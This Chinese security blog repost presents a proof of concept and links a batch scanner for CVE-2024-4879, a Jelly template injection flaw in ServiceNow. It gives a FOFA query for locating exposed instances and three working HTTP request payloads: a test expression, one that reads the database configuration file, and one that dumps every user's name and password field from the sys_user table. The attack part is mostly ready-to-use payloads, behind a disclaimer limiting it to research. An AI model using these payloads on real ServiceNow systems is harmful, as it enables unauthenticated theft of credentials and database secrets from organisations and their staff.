CVE-2024-4879 POC&批量扫描工具

admin 2024年7月15日11:34:17评论67 views字数 1550阅读5分10秒阅读模式

ServiceNow-UI存在Jelly模板注入漏洞(CVE-2024-4879)

ServiceNow是一家提供企业级云计算服务的公司,其产品是一种基于云的服务管理解决方案,旨在帮助组织简化和自动化业务流程。ServiceNow的平台提供了各种功能,包括IT服务管理、IT运营管理、IT业务管理、客户服务管理、人力资源服务管理等,帮助企业提高效率、降低成本并提升服务质量。由于输入验证不严格,ServiceNow中的Jelly模板和Glide表达式存在注入漏洞,未经身份验证的攻击者可以通过构造恶意请求来利用这些漏洞,从而实现远程代码执行。

fofa

app="servicenow-Products"

poc

GET /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style> HTTP/1.1
Host: 
CVE-2024-4879  POC&批量扫描工具
image-20240712235518735

读取数据库配置文件

GET /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
Host: 
CVE-2024-4879  POC&批量扫描工具
image-20240712235342615
CVE-2024-4879  POC&批量扫描工具
image-20240712235455652

读取密码

/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gr=new GlideRecord("sys_user");gr.query();s="";while(gr.next())s=s.concat(gr.user_name," : ",gr.user_password,"<br/>");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
CVE-2024-4879  POC&批量扫描工具
image-20240713000223133

ServiceNow CVE-2024-4879漏洞的批量扫描工具。

该工具专为批量扫描ServiceNow CVE-2024-4879漏洞而设计。它的灵感来自Assetnote安全研究,该研究详细涵盖了最近的ServiceNow CVE-2024-4879、CVE-2024-5178和CVE-2024-5217漏洞。

https://github.com/bigb0x/CVE-2024-4879

漏洞来源

  • • https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
 

原文始发于微信公众号(乌雲安全):CVE-2024-4879 POC&批量扫描工具

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月15日11:34:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-4879 POC&批量扫描工具http://cn-sec.com/archives/2955344.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息